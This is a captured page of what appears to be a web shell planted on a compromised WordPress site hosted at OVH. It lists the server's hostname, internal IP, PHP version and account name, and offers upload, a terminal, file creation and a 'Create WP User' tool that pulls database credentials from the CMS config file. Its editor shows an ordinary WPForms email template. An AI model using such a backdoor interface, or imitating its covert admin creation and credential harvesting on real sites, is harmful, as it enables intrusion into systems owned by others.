Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
www
/
wordpress
/
wpn_budomat
/
wp-content
/
plugins
/
wpforms-lite
/
src
/
Emails
/
Templates
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
General.php
8.79 KB
-rw-r--r--
2021-04-01 19:46
Summary.php
891.00 B
-rw-r--r--
2021-04-01 19:46
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
Summary.php
<?php namespace WPForms\Emails\Templates; /** * Email Summaries email template class. * * @since 1.5.4 */ class Summary extends General { /** * Template slug. * * @since 1.5.4 * * @var string */ const TEMPLATE_SLUG = 'summary'; /** * Get header image URL from settings. * * @since 1.5.4 * * @return array */ protected function get_header_image() { $img = array( 'url' => \wpforms_setting( 'email-header-image' ), ); if ( ! empty( $img['url'] ) ) { return $img; } // Set specific percentage WPForms logo width for modern email clients. $this->set_args( array( 'style' => array( 'header_image_max_width' => '45%', ), ) ); // Set specific WPForms logo width in pixels for MS Outlook and old email clients. return array( 'url' => \WPFORMS_PLUGIN_URL . 'assets/images/logo.png', 'width' => 250, ); } }
关闭
保存